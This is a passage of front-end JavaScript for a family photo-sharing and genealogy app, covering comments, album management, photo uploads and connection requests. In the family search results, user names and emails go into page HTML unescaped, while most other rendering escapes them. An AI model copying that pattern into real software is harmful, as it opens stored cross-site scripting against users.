                        const currentText = countSpan.textContent;
                        const currentCount = parseInt(currentText) || 0;
                        const newCount = currentCount + 1;
                        countSpan.textContent = `${newCount} ${newCount === 1 ? 'Comment' : 'Comments'}`;
                    }
                }
            }
        }

        function showReplyForm(commentId, postId) {
            // Hide any other open reply forms
            document.querySelectorAll('[id^="reply-form-"]').forEach(form => {
                form.classList.add('hidden');
            });

            const replyForm = document.getElementById(`reply-form-${commentId}`);
            if (replyForm) {
                replyForm.classList.remove('hidden');
                const replyInput = document.getElementById(`reply-input-${commentId}`);
                if (replyInput) {
                    replyInput.focus();
                }
            }
        }

        function hideReplyForm(commentId) {
            const replyForm = document.getElementById(`reply-form-${commentId}`);
            if (replyForm) {
                replyForm.classList.add('hidden');
                const replyInput = document.getElementById(`reply-input-${commentId}`);
                if (replyInput) {
                    replyInput.value = '';
                }
            }
        }

        async function toggleCommentLike(commentId, postId, currentlyLiked) {
            try {
                if (currentlyLiked) {
                    await apiFetch(`${API_BASE_URL}/comments/${commentId}/unlike`, {
                        method: 'POST'
                    });
                } else {
                    await apiFetch(`${API_BASE_URL}/comments/${commentId}/like`, {
                        method: 'POST'
                    });
                }

                await fetchAndRenderComments(postId);
            } catch (error) {
                console.error("Error toggling comment like:", error);
                alert("Failed to " + (currentlyLiked ? "unlike" : "like") + " comment: " + error.message);
            }
        }

        function confirmDeleteComment(commentId, postId) {
            if (confirm('Are you sure you want to delete this comment? This will also delete all replies.')) {
                deleteComment(commentId, postId);
            }
        }

        async function deleteComment(commentId, postId) {
            try {
                await apiFetch(`${API_BASE_URL}/comments/${commentId}`, {
                    method: 'DELETE'
                });

                // Refresh comments list
                const comments = await apiFetch(`${API_BASE_URL}/posts/${postId}/comments`);
                const commentsList = document.getElementById(`comments-list-${postId}`);
                if (commentsList && comments.length === 0) {
                    commentsList.innerHTML = '<p class="text-sm text-center text-gray-500">No comments yet. Be the first to comment!</p>';
                } else if (commentsList) {
                    const nestedComments = buildNestedComments(comments);
                    commentsList.innerHTML = nestedComments.map(comment => renderComment(comment, postId)).join('');
                }

                // Update comment count in the feed (without re-rendering everything)
                const postElement = document.querySelector(`[data-post-id="${postId}"]`);
                if (postElement) {
                    const commentButton = postElement.querySelector(`button[onclick*="toggleComments(${postId})"]`);
                    if (commentButton) {
                        const countSpan = commentButton.querySelector('span.text-sm');
                        if (countSpan) {
                            const newCount = comments.length;
                            countSpan.textContent = `${newCount} ${newCount === 1 ? 'Comment' : 'Comments'}`;
                        }
                    }
                }
            } catch (error) {
                console.error("Error deleting comment:", error);
                alert("Failed to delete comment: " + error.message);
            }
        }

        function confirmBlockUser(userId, userName) {
            if (confirm(`Are you sure you want to block ${escapeHtml(userName)}? You will no longer see their posts or comments.`)) {
                blockUser(userId);
            }
        }

        async function blockUser(userId) {
            try {
                await apiFetch(`${API_BASE_URL}/users/${userId}/block`, {
                    method: 'POST'
                });

                alert("User blocked successfully. Their content will no longer appear in your feed.");
                // B38 followup: refresh every surface that could show the
                // blocked user. Without these the Members tab still shows
                // them as active and the FTV still has their card until
                // the user hard-reloads.
                await fetchAndRenderFeed(true, true);
                if (typeof fetchAndRenderMembers === 'function') {
                    try { await fetchAndRenderMembers(); } catch (e) { console.warn('post-block members refresh failed', e); }
                }
                if (typeof loadFamilyTreeData === 'function') {
                    try { await loadFamilyTreeData(); } catch (e) { console.warn('post-block tree refresh failed', e); }
                }
            } catch (error) {
                console.error("Error blocking user:", error);
                alert("Failed to block user: " + error.message);
            }
        }

        // --- ACTION HANDLERS ---
        async function handleCreateAlbum(event) {
            event.preventDefault();
            const errorDiv = document.getElementById('create-album-error');
            errorDiv.textContent = '';
            try {
                const title = document.getElementById('album-title').value;
                const description = document.getElementById('album-description').value;
                await apiFetch(`${API_BASE_URL}/users/${appState.currentUserNeo4jId}/album`, { method: 'POST', body: { title, description } });
                closeModal('create-album-modal');
                await fetchAndRenderAlbums();
            } catch (error) {
                errorDiv.textContent = error.message;
            }
        }

        async function handleRenameAlbum(event) {
            event.preventDefault();
            const form = document.getElementById('rename-album-form');
            const errorDiv = document.getElementById('rename-album-error');
            if (errorDiv) errorDiv.textContent = '';
            if (!form) return;
            const albumId = parseInt(form.dataset.albumId, 10);
            if (Number.isNaN(albumId)) {
                if (errorDiv) errorDiv.textContent = 'Album id missing.';
                return;
            }
            const title = (document.getElementById('rename-album-title').value || '').trim();
            const description = (document.getElementById('rename-album-description').value || '').trim();
            if (!title) {
                if (errorDiv) errorDiv.textContent = 'Album title cannot be empty.';
                return;
            }
            try {
                const updated = await apiFetch(`${API_BASE_URL}/albums/${albumId}`, {
                    method: 'PATCH',
                    body: { title, description },
                });
                closeModal('rename-album-modal');
                _ebwToast('Album renamed');
                // Two consumers: the album list view + the album detail
                // view. Refresh whichever is active. On detail, also
                // patch the h2 in place and update history state so a
                // refresh restores the new name (F5 restore reads
                // history.state.params.albumTitle).
                if (appState.currentView === 'photo-albums-view') {
                    fetchAndRenderAlbums();
                } else if (appState.currentView === 'album-detail-view') {
                    const h2 = document.querySelector('#album-detail-view h2');
                    if (h2) h2.textContent = updated.title || title;
                    // Update history state in place so refresh restores
                    // the fresh name/description, not the stale ones
                    // captured at initial nav.
                    const state = window.history.state || {};
                    const params = { ...(state.params || {}) };
                    params.albumTitle = updated.title || title;
                    params.albumDescription = updated.description || description;
                    window.history.replaceState({ ...state, params }, '', window.location.href);
                    // Also patch the detail view's data attrs so a second
                    // rename from the detail page prefills the new values.
                    const detailView = document.getElementById('album-detail-view');
                    if (detailView) {
                        detailView.dataset.albumTitle = params.albumTitle;
                        detailView.dataset.albumDescription = params.albumDescription;
                    }
                }
            } catch (error) {
                if (errorDiv) errorDiv.textContent = error.message || 'Rename failed';
            }
        }

        // Session 2c Task 4: shared helper — route a photo picker click through
        // the native camera plugin on Capacitor, or fall back to the input's
        // click on web. Callers pass the file input's ID; on success, we set
        // input.files via DataTransfer + dispatch a `change` event, so all
        // downstream preview/upload/onchange handlers run identically to a
        // hand-picked file. Adds client-side compression to every photo upload
        // path in one seam — the F22-era native camera behavior for the header
        // quick-upload gets extended to Add Person, Edit Person, Photo Album,
        // and any future picker without touching each downstream handler.
        async function ebwOpenPhotoPicker(inputId, options = {}) {
            const input = document.getElementById(inputId);
            if (!input) return;

            const isNativeApp = !!(window.Capacitor && window.Capacitor.isNativePlatform && window.Capacitor.isNativePlatform());
            if (!isNativeApp || typeof window.nativePickAndCompressImage !== 'function') {
                input.click();
                return;
            }

            try {
                const result = await window.nativePickAndCompressImage(options);
                if (result.canceled) return;
                if (typeof window.nativeHapticTap === 'function') window.nativeHapticTap();
                // Wrap the compressed blob as a File so downstream handlers
                // that read event.target.files[0].name / .type work unchanged.
                const file = new File([result.blob], result.filename, { type: result.blob.type });
                const dt = new DataTransfer();
                dt.items.add(file);
                input.files = dt.files;
                input.dispatchEvent(new Event('change', { bubbles: true }));
            } catch (err) {
                alert(err.message || 'Photo picker failed');
            }
        }
        if (typeof window !== 'undefined') window.ebwOpenPhotoPicker = ebwOpenPhotoPicker;

        function handleQuickUploadClick() {
            // Session 2c Task 4: on native, route through @capacitor/camera
            // (prompt source — user picks Camera vs Photos) + client-side
            // compression. On web, fall back to the existing hidden file
            // input click. Same downstream upload endpoint either way.
            if (typeof window.nativePickAndCompressImage === 'function' &&
                window.Capacitor && window.Capacitor.isNativePlatform && window.Capacitor.isNativePlatform()) {
                _quickUploadViaNativePicker();
                return;
            }
            document.getElementById('quick-upload-input').click();
        }

        // Session 2c Task 4: native-camera + compress + upload path.
        // Mirrors handleQuickUploadSubmit's upload logic but takes a
        // pre-compressed Blob from nativePickAndCompressImage instead of
        // a File from event.target.files.
        async function _quickUploadViaNativePicker(opts) {
            // Session 2c Task 5: gate on connectivity. Fires BEFORE opening
            // the camera picker so we don't waste a user's tap capturing a
            // photo that can't upload.
            if (typeof window.nativeGetNetworkStatus === 'function') {
                const net = window.nativeGetNetworkStatus();
                if (!net.connected) {
                    alert("You're offline. Reconnect to Wi-Fi or cellular to upload photos.");
                    return;
                }
            }
            const btn = document.querySelector('[data-quick-upload-btn]');
            let originalHtml = null;
            // Session 2c.1 #5: source is now controlled by the caller so the
            // Add action sheet can route directly to 'camera' or 'photos'
            // without going through the prompt.
            const source = (opts && opts.source) || 'prompt';
            try {
                const result = await window.nativePickAndCompressImage({ source });
                if (result.canceled) return;
                // Haptic on capture confirmation (Task 3 event #2 refinement).
                if (typeof window.nativeHapticTap === 'function') window.nativeHapticTap();

                // Header camera icon → spinner during upload (F22 pattern).
                if (btn) {
                    originalHtml = btn.innerHTML;
                    btn.innerHTML = `
                        <svg class="animate-spin" width="22" height="22" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg" aria-hidden="true">
                            <circle cx="12" cy="12" r="10" stroke="currentColor" stroke-width="2" stroke-opacity="0.25"/>
                            <path d="M22 12a10 10 0 0 0-10-10" stroke="currentColor" stroke-width="2" stroke-linecap="round"/>
                        </svg>
                    `;
                    btn.disabled = true;
                    btn.setAttribute('aria-label', 'Uploading photo…');
                    btn.setAttribute('title', 'Uploading…');
                }

                const formData = new FormData();
                formData.append('photo', result.blob, result.filename);
                await apiFetch(`${API_BASE_URL}/users/${appState.currentUserNeo4jId}/photo`, {
                    method: 'POST',
                    body: formData,
                });

                // Post-upload nav: land in the user's default photo album
                // (F22 pattern — see handleQuickUploadSubmit for detail).
                try {
                    const albums = await apiFetch(`${API_BASE_URL}/users/${appState.currentUserNeo4jId}/albums`);
                    const defaultAlbum = (albums || []).find(a => a.isDefault === true);
                    if (defaultAlbum) {
                        navigateToView('album-detail-view', {
                            albumId: defaultAlbum.id,
                            albumTitle: defaultAlbum.title || '',
                            albumDescription: defaultAlbum.description || '',
                            albumIsDefault: true,
                        });
                    } else {
                        navigateToView('photo-albums-view');
                    }
                } catch (navError) {
                    navigateToView('photo-albums-view');
                }
            } catch (err) {
                alert(err.message || 'Photo upload failed');
            } finally {
                if (btn) {
                    if (originalHtml !== null) btn.innerHTML = originalHtml;
                    btn.disabled = false;
                    btn.setAttribute('aria-label', 'Upload a photo');
                    btn.setAttribute('title', 'Upload a photo');
                }
            }
        }

        // Mirror the backend's photos.py _validate_photo_upload so the
        // user sees a friendly message BEFORE the multipart POST goes
        // out. Backend still enforces on receipt (defense in depth).
        function _validatePhotoFile(file) {
            if (!file || !file.type || !file.type.startsWith('image/')) {
                return `Please choose an image file (JPG, PNG, GIF, WebP). Got "${(file && file.type) || 'unknown'}".`;
            }
            const MAX_BYTES = 20 * 1024 * 1024;
            if (file.size > MAX_BYTES) {
                return `Image is too large (${(file.size / (1024 * 1024)).toFixed(1)} MB). Maximum is 20 MB.`;
            }
            return null;
        }

        async function handleQuickUploadSubmit(event) {
             const file = event.target.files[0];
            if (!file) return;
            const validationError = _validatePhotoFile(file);
            if (validationError) {
                alert(validationError);
                event.target.value = null;
                return;
            }
            const formData = new FormData();
            formData.append('photo', file);
            // F22: swap the header camera icon for a spinner during the
            // upload — the pre-F22 behavior was silent. Restore on
            // completion or error via the finally block.
            const btn = document.querySelector('[data-quick-upload-btn]');
            let originalHtml = null;
            if (btn) {
                originalHtml = btn.innerHTML;
                btn.innerHTML = `
                    <svg class="animate-spin" width="22" height="22" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg" aria-hidden="true">
                        <circle cx="12" cy="12" r="10" stroke="currentColor" stroke-width="2" stroke-opacity="0.25"/>
                        <path d="M22 12a10 10 0 0 0-10-10" stroke="currentColor" stroke-width="2" stroke-linecap="round"/>
                    </svg>
                `;
                btn.disabled = true;
                btn.setAttribute('aria-label', 'Uploading photo…');
                btn.setAttribute('title', 'Uploading…');
            }
            try {
                await apiFetch(`${API_BASE_URL}/users/${appState.currentUserNeo4jId}/photo`, { method: 'POST', body: formData });
                // F22: post-upload navigation lands INSIDE the default
                // album so the photo the user just uploaded is immediately
                // visible. Upload response returns the Photo node; we
                // don't have the album id from that, so fetch the user's
                // albums to find isDefault. Fallback to the album list if
                // no default exists (shouldn't happen post-upload since
                // quick_upload_photo MERGE-creates it).
                try {
                    const albums = await apiFetch(`${API_BASE_URL}/users/${appState.currentUserNeo4jId}/albums`);
                    const defaultAlbum = (albums || []).find(a => a.isDefault === true);
                    if (defaultAlbum) {
                        navigateToView('album-detail-view', {
                            albumId: defaultAlbum.id,
                            albumTitle: defaultAlbum.title || '',
                            albumDescription: defaultAlbum.description || '',
                            albumIsDefault: true,
                        });
                    } else {
                        navigateToView('photo-albums-view');
                    }
                } catch (navError) {
                    navigateToView('photo-albums-view');
                }
            } catch (error) {
                alert(`Upload failed: ${error.message}`);
            } finally {
                event.target.value = null;
                if (btn) {
                    if (originalHtml !== null) btn.innerHTML = originalHtml;
                    btn.disabled = false;
                    btn.setAttribute('aria-label', 'Upload a photo');
                    btn.setAttribute('title', 'Upload a photo');
                }
            }
        }

        // Global state for pending album upload. Renamed from the pre-F20
        // singular pendingPhotoFile to an array. Batch capped at 10 (matches
        // posts.py mixed-media convention). Backend unchanged — we loop
        // the existing single-photo endpoint sequentially.
        let pendingPhotoFiles = [];
        let pendingPhotoAlbumId = null;
        const _ALBUM_UPLOAD_MAX_BATCH = 10;

        async function handleAlbumUpload(event) {
            const files = [...event.target.files];
            if (files.length === 0) return;

            const albumId = event.target.dataset.albumId;
            if (!albumId) {
                alert('Album ID not found');
                event.target.value = null;
                return;
            }
            pendingPhotoAlbumId = albumId;

            // Cap batch size (posts.py convention). Overflow is a soft
            // warning — first N proceed rather than rejecting the whole
            // batch. Aggressive selection is more common than intentional.
            let overflowMessage = '';
            let toValidate = files;
            if (files.length > _ALBUM_UPLOAD_MAX_BATCH) {
                overflowMessage = `Selected ${files.length} photos; the first ${_ALBUM_UPLOAD_MAX_BATCH} will be uploaded.`;
                toValidate = files.slice(0, _ALBUM_UPLOAD_MAX_BATCH);
            }

            // Per-file size/type validation (P2 wave check from earlier —
            // _validatePhotoFile mirrors the backend photos.py validator).
            const valid = [];
            const rejected = [];
            for (const file of toValidate) {
                const err = _validatePhotoFile(file);
                if (err) rejected.push({ name: file.name, reason: err });
                else valid.push(file);
            }
            pendingPhotoFiles = valid;

            if (pendingPhotoFiles.length === 0) {
                // Nothing to upload — surface everything inline via alert
                // (modal isn't open yet to host an error div).
                const parts = [];
                if (overflowMessage) parts.push(overflowMessage);
                parts.push(...rejected.map(r => `${r.name}: ${r.reason}`));
                parts.push('No valid photos to upload.');
                alert(parts.join('\n'));
                event.target.value = null;
                return;
            }

            _renderUploadModalChrome();
            _renderUploadModalPreviews();
            _renderUploadModalRejects(rejected, overflowMessage);

            // Clear caption input on every fresh open.
            const captionInput = document.getElementById('photo-caption-input');
            if (captionInput) captionInput.value = '';

            openModal('upload-photo-modal');
            event.target.value = null;
        }

        // Update title, caption label, submit button copy for the current
        // pendingPhotoFiles.length. Called from handleAlbumUpload and after
        // any change to pendingPhotoFiles (e.g. partial-failure reduction).
        function _renderUploadModalChrome() {
            const n = pendingPhotoFiles.length;
            const title = document.getElementById('upload-photo-title');
            const label = document.getElementById('photo-caption-label');
            const submitBtn = document.getElementById('upload-photo-submit-btn');
            if (title) title.textContent = n <= 1 ? 'Upload Photo' : `Upload Photos (${n})`;
            if (label) label.textContent = n <= 1
                ? 'Caption (Optional)'
                : 'Caption (optional, applies to all)';
            if (submitBtn) {
                submitBtn.disabled = false;
                submitBtn.textContent = n <= 1 ? 'Upload' : `Upload ${n}`;
            }
        }

        function _renderUploadModalPreviews() {
            const previewDiv = document.getElementById('upload-photo-preview');
            if (!previewDiv) return;
            if (pendingPhotoFiles.length === 0) {
                previewDiv.innerHTML = '';
                return;
            }
            if (pendingPhotoFiles.length === 1) {
                // Single-file path: preserve the pre-F20 look (large preview
                // with shadow — feels different from a 1-cell grid).
                previewDiv.innerHTML = `
                    <div data-preview-slot="0" class="w-full h-40 bg-gray-100 rounded-md animate-pulse"></div>
                `;
            } else {
                // Multi-file grid — 3 cols aspect-square, capped scroll.
                previewDiv.innerHTML = `
                    <div class="grid grid-cols-3 gap-2 max-h-64 overflow-y-auto">
                        ${pendingPhotoFiles.map((_, i) => `
                            <div data-preview-slot="${i}" class="aspect-square bg-gray-100 rounded animate-pulse"></div>
                        `).join('')}
                    </div>
                `;
            }
            // Read each file async and swap the skeleton for the thumbnail.
            pendingPhotoFiles.forEach((file, i) => {
                const reader = new FileReader();
                reader.onload = function(e) {
                    const slot = previewDiv.querySelector(`[data-preview-slot="${i}"]`);
                    if (!slot) return;
                    slot.classList.remove('animate-pulse', 'bg-gray-100');
                    if (pendingPhotoFiles.length === 1) {
                        slot.innerHTML = `<img src="${e.target.result}" alt="Photo preview" class="w-full rounded-md shadow-md max-h-64 object-cover">`;
                    } else {
                        slot.innerHTML = `<img src="${e.target.result}" alt="${escapeHtml(file.name)}" class="w-full h-full object-cover rounded">`;
                    }
                };
                reader.readAsDataURL(file);
            });
        }

        function _renderUploadModalRejects(rejected, overflowMessage) {
            const errorDiv = document.getElementById('upload-photo-error');
            if (!errorDiv) return;
            const parts = [];
            if (overflowMessage) parts.push(escapeHtml(overflowMessage));
            if (rejected.length > 0) {
                parts.push('Skipped: ' + rejected.map(r => escapeHtml(r.name)).join(', '));
            }
            errorDiv.innerHTML = parts.map(p => `<div>${p}</div>`).join('');
        }

        async function handlePhotoUploadSubmit(event) {
            event.preventDefault();

            if (pendingPhotoFiles.length === 0 || !pendingPhotoAlbumId) return;

            const captionInput = document.getElementById('photo-caption-input');
            const caption = captionInput ? captionInput.value.trim() : '';
            const submitBtn = document.getElementById('upload-photo-submit-btn');
            const errorDiv = document.getElementById('upload-photo-error');

            const total = pendingPhotoFiles.length;
            const failures = [];

            if (submitBtn) submitBtn.disabled = true;
            if (errorDiv) errorDiv.innerHTML = '';

            // Sequential loop — mobile uplinks + App Engine both prefer
            // one-at-a-time over parallel POSTs at this size. Also lets
            // "Uploading N of M…" reflect real progress.
            for (let i = 0; i < pendingPhotoFiles.length; i++) {
                const file = pendingPhotoFiles[i];
                if (submitBtn) {
                    submitBtn.textContent = total === 1
                        ? 'Uploading…'
                        : `Uploading ${i + 1} of ${total}…`;
                }
                try {
                    const formData = new FormData();
                    formData.append('photo', file);
                    if (caption) formData.append('caption', caption);
                    await apiFetch(`${API_BASE_URL}/albums/${pendingPhotoAlbumId}/photo`, {
                        method: 'POST',
                        body: formData,
                    });
                } catch (error) {
                    failures.push({ file, name: file.name, reason: error?.message || String(error) });
                }
            }

            const albumIdToRefresh = pendingPhotoAlbumId;

            if (failures.length === 0) {
                // All succeeded — close, clear, refresh, toast.
                closeModal('upload-photo-modal');
                pendingPhotoFiles = [];
                pendingPhotoAlbumId = null;
                _ebwToast(total === 1 ? 'Photo uploaded' : `Uploaded ${total} photos`);
            } else {
                // Partial (or total) failure — keep modal open, reduce
                // pendingPhotoFiles to just the failures so Retry re-submits
                // only those. Re-render previews + chrome to match.
                pendingPhotoFiles = failures.map(f => f.file);
                _renderUploadModalChrome();
                _renderUploadModalPreviews();
                const successCount = total - failures.length;
                const lines = [];
                if (successCount > 0) {
                    lines.push(`<div class="text-green-600">${successCount} uploaded successfully.</div>`);
                }
                lines.push(`<div>Failed: ${failures.map(f => escapeHtml(f.name)).join(', ')}</div>`);
                if (errorDiv) errorDiv.innerHTML = lines.join('');
                if (submitBtn) {
                    submitBtn.disabled = false;
                    submitBtn.textContent = failures.length === 1
                        ? 'Retry'
                        : `Retry (${failures.length})`;
                }
            }

            // Refresh the grid either way so successes appear even on
            // partial failure. Prompt 15: preserve _currentAlbumSharedRole
            // so a contributor's post-upload refresh doesn't reset the
            // shared context to null.
            fetchAndRenderPhotos(parseInt(albumIdToRefresh), _currentAlbumSharedRole);
        }

        async function deleteCurrentPhoto() {
            if (currentAlbumPhotos.length === 0) return;

            const photo = currentAlbumPhotos[currentPhotoIndex];
            if (!photo || !photo.id) return;

            if (!confirm('Are you sure you want to delete this photo? This action cannot be undone.')) {
                return;
            }

            try {
                await apiFetch(`${API_BASE_URL}/photos/${photo.id}`, { method: 'DELETE' });

                // Remove photo from current array
                currentAlbumPhotos.splice(currentPhotoIndex, 1);

                if (currentAlbumPhotos.length === 0) {
                    // No more photos, close lightbox and refresh
                    closePhotoLightbox();
                    _ebwToast('Photo deleted');
                    if (currentAlbumId) {
                        await fetchAndRenderPhotos(currentAlbumId, _currentAlbumSharedRole);
                    }
                } else {
                    // Move to next photo (or wrap to first)
                    if (currentPhotoIndex >= currentAlbumPhotos.length) {
                        currentPhotoIndex = 0;
                    }
                    updateLightboxPhoto();

                    // Refresh the grid in background
                    if (currentAlbumId) {
                        await fetchAndRenderPhotos(currentAlbumId, _currentAlbumSharedRole);
                    }

                    // Show success message briefly
                    const counter = document.getElementById('lightbox-counter');
                    if (counter) {
                        const originalText = counter.textContent;
                        counter.textContent = 'Photo deleted';
                        counter.classList.add('text-green-400');
                        setTimeout(() => {
                            counter.textContent = originalText;
                            counter.classList.remove('text-green-400');
                        }, 2000);
                    }
                }
            } catch (error) {
                console.error('Error deleting photo:', error);
                alert(`Failed to delete photo: ${error.message}`);
            }
        }

        async function deletePhotoFromGrid(photoId, index) {
            if (!confirm('Are you sure you want to delete this photo? This action cannot be undone.')) {
                return;
            }

            try {
                await apiFetch(`${API_BASE_URL}/photos/${photoId}`, { method: 'DELETE' });

                // Refresh the photo grid using the global currentAlbumId
                if (currentAlbumId) {
                    await fetchAndRenderPhotos(currentAlbumId, _currentAlbumSharedRole);
                }

                _ebwToast('Photo deleted');
            } catch (error) {
                const errorMessage = error?.message || error?.toString() || 'Unknown error';
                _ebwToast(`Failed to delete photo: ${errorMessage}`, { tone: 'error' });
            }
        }

        async function deleteAlbum(albumId, albumTitle) {
            if (!confirm(`Are you sure you want to delete the album "${albumTitle}" and all its photos? This action cannot be undone.`)) {
                return;
            }

            try {
                await apiFetch(`${API_BASE_URL}/albums/${albumId}`, { method: 'DELETE' });
                // Refresh albums list
                fetchAndRenderAlbums();
            } catch (error) {
                alert(`Failed to delete album: ${error.message}`);
            }
        }

        // --- CONNECTION TAB FUNCTIONS ---

        // Switch between main tabs in Family & Connections
        function switchConnectionTab(tabName) {
            // Update tab buttons
            const tabs = ['find-family', 'requests', 'members', 'invitations'];
            tabs.forEach(tab => {
                const btn = document.getElementById(`tab-${tab}`);
                const content = document.getElementById(`tab-content-${tab}`);

                if (tab === tabName) {
                    btn?.classList.add('text-primary', 'bg-gray-50', 'border-primary');
                    btn?.classList.remove('text-gray-600', 'border-transparent');
                    content?.classList.remove('hidden');
                } else {
                    btn?.classList.remove('text-primary', 'bg-gray-50', 'border-primary');
                    btn?.classList.add('text-gray-600', 'border-transparent');
                    content?.classList.add('hidden');
                }
            });

            // Load content for the selected tab
            if (tabName === 'requests') {
                loadConnectionRequests('received');
                loadPendingRequestsCount();
            } else if (tabName === 'members') {
                // Members tab loads automatically via existing mechanism
            } else if (tabName === 'invitations') {
                // Invitations load automatically via existing mechanism
            }
        }

        // Switch between received/sent sub-tabs in Requests tab
        function switchRequestsSubTab(subTab) {
            const receivedBtn = document.getElementById('subtab-received');
            const sentBtn = document.getElementById('subtab-sent');
            const receivedContent = document.getElementById('received-requests-content');
            const sentContent = document.getElementById('sent-requests-content');

            if (subTab === 'received') {
                receivedBtn?.classList.add('text-primary', 'border-primary');
                receivedBtn?.classList.remove('text-gray-600', 'border-transparent');
                sentBtn?.classList.remove('text-primary', 'border-primary');
                sentBtn?.classList.add('text-gray-600', 'border-transparent');
                receivedContent?.classList.remove('hidden');
                sentContent?.classList.add('hidden');
                loadConnectionRequests('received');
            } else {
                sentBtn?.classList.add('text-primary', 'border-primary');
                sentBtn?.classList.remove('text-gray-600', 'border-transparent');
                receivedBtn?.classList.remove('text-primary', 'border-primary');
                receivedBtn?.classList.add('text-gray-600', 'border-transparent');
                sentContent?.classList.remove('hidden');
                receivedContent?.classList.add('hidden');
                loadConnectionRequests('sent');
            }
        }

        // Search for family members with debounce
        let searchTimeout;
        async function handleFamilySearch() {
            clearTimeout(searchTimeout);

            const searchInput = document.getElementById('family-search-input');
            const resultsDiv = document.getElementById('family-search-results');

            if (!searchInput || !resultsDiv) return;

            const query = searchInput.value.trim();

            if (query.length < 2) {
                resultsDiv.innerHTML = '<p class="text-center text-gray-500 text-sm py-8">Start typing to search for family members</p>';
                return;
            }

            // Show loading
            resultsDiv.innerHTML = '<p class="text-center text-gray-500 py-8">Searching...</p>';

            // Debounce search
            searchTimeout = setTimeout(async () => {
                try {
                    const response = await apiFetch(`${API_BASE_URL}/users/search?q=${encodeURIComponent(query)}`);
                    const users = response.users || [];

                    if (users.length === 0) {
                        resultsDiv.innerHTML = '<p class="text-center text-gray-500 text-sm py-8">No users found</p>';
                        return;
                    }

                    // Render search results
                    resultsDiv.innerHTML = users.map(user => `
                        <div class="flex items-center justify-between p-4 bg-gray-50 rounded-lg hover:bg-gray-100 transition-colors">
                            <div class="flex items-center gap-3">
                                <div class="w-12 h-12 rounded-full bg-primary text-white flex items-center justify-center text-lg font-semibold">
                                    ${user.name ? escapeHtml(user.name.charAt(0).toUpperCase()) : "?"}
                                </div>
                                <div>
                                    <p class="font-medium text-gray-900">${user.name || 'Unknown'}</p>
                                    <p class="text-sm text-gray-600">${user.email}</p>
                                </div>
                            </div>
                            <button
                                onclick="openSendConnectionRequestModal(${user.id}, '${escapeHtml(user.name || user.email)}')"
                                class="px-4 py-2 bg-primary text-white rounded-md hover:bg-primary-dark transition-colors text-sm font-medium"
                            >
                                Send Request
                            </button>
                        </div>
                    `).join('');

                } catch (error) {
                    console.error('Error searching users:', error);
                    const errorMsg = error.message || error.toString();
                    resultsDiv.innerHTML = `<p class="text-center text-red-500 py-8">Error: ${escapeHtml(errorMsg)}</p>`;
                }
            }, 300);
        }

        // Load connection requests (received or sent)
        async function loadConnectionRequests(type) {
            const contentDiv = type === 'received'
                ? document.getElementById('received-requests-content')
                : document.getElementById('sent-requests-content');

            if (!contentDiv) return;

            contentDiv.innerHTML = '<p class="text-center text-gray-500 py-8">Loading requests...</p>';

            try {
                const response = await apiFetch(`${API_BASE_URL}/connection-requests?type=${type}`);
                const requests = response.requests || [];

                if (requests.length === 0) {
                    contentDiv.innerHTML = `<p class="text-center text-gray-500 py-8">No ${type} requests</p>`;
                    return;
                }

                // Map relationship code -> readable label for display
                const relLabel = (code) => {
                    if (!code) return null;
                    const map = {
                        child: 'their child',
                        parent: 'their parent',
                        sibling: 'their sibling',
                        spouse: 'their spouse / partner',
                        grandparent: 'their grandparent',
                        grandchild: 'their grandchild',
                        'aunt-uncle': 'their aunt / uncle',
                        'niece-nephew': 'their niece / nephew',
                        cousin: 'their cousin',
                        other: 'related (other)',
                    };
                    return map[String(code).toLowerCase()] || String(code);
                };

                // Render requests
                contentDiv.innerHTML = requests.map(req => {
                    const rel = relLabel(req.relationshipType);
                    return `
                    <div class="p-4 bg-gray-50 rounded-lg space-y-3">
                        <div class="flex items-start gap-3">
                            <div class="w-12 h-12 rounded-full bg-primary text-white flex items-center justify-center text-lg font-semibold flex-shrink-0">
                                ${req.userName ? req.userName.charAt(0).toUpperCase() : '?'}
                            </div>
                            <div class="flex-1 min-w-0">
                                <p class="font-medium text-gray-900">${escapeHtml(req.userName) || 'Unknown'}</p>
                                <p class="text-sm text-gray-600 break-all">${escapeHtml(req.userEmail) || ''}</p>
                                ${rel ? `
                                    <p class="text-sm text-gray-700 mt-2">
                                        Says they are <strong>${escapeHtml(rel)}</strong>${type === 'received' ? '' : ' of the tree owner'}.
                                    </p>
                                ` : ''}
                            </div>
                            <div class="flex gap-2 flex-shrink-0">
                                ${type === 'received' ? `
                                    <button
                                        onclick="acceptConnectionRequest(${req.requestId})"
                                        class="px-4 py-2 bg-green-600 text-white rounded-md hover:bg-green-700 transition-colors text-sm font-medium"
                                    >
                                        Accept
                                    </button>
                                    <button
                                        onclick="declineConnectionRequest(${req.requestId})"
                                        class="px-4 py-2 bg-gray-300 text-gray-700 rounded-md hover:bg-gray-400 transition-colors text-sm font-medium"
                                    >
                                        Decline
                                    </button>
                                ` : `
                                    <span class="px-3 py-1 bg-yellow-100 text-yellow-800 rounded-full text-xs font-medium self-start">Pending</span>
                                `}
                            </div>
                        </div>

                        ${req.message ? `
                            <div class="border-l-4 border-primary bg-white p-3 rounded">
                                <p class="text-xs font-medium text-gray-500 mb-1">Their message</p>
                                <p class="text-sm text-gray-800 whitespace-pre-wrap">${escapeHtml(req.message)}</p>
                            </div>
                        ` : ''}
                    </div>
                `;
                }).join('');

            } catch (error) {
                console.error('Error loading connection requests:', error);
                contentDiv.innerHTML = '<p class="text-center text-red-500 py-8">Error loading requests</p>';
            }
        }

        // Load count of pending requests for badge
        async function loadPendingRequestsCount() {
            try {
                const response = await apiFetch(`${API_BASE_URL}/connection-requests?type=received`);
                const count = (response.requests || []).length;

                // B35: same count drives three surfaces — the in-page badge
                // on the Family & Connections requests tab, plus the new
                // notification dots on the sidebar (desktop) and mobile-nav
                // entries so the pending state is visible without entering
                // the page.
                ['requests-badge', 'sidebar-pending-badge', 'mobile-pending-badge'].forEach((id) => {
                    const badge = document.getElementById(id);
                    if (!badge) return;
                    if (count > 0) {
                        badge.textContent = count > 99 ? '99+' : String(count);
                        badge.classList.remove('hidden');
                    } else {
                        badge.classList.add('hidden');
                    }
                });
            } catch (error) {
                console.error('Error loading pending requests count:', error);
            }
        }

        // Open modal to send connection request
        let pendingConnectionRequest = null;
        function openSendConnectionRequestModal(userId, userName) {
            pendingConnectionRequest = { userId, userName };

            // Create and show modal
            const modalHtml = `
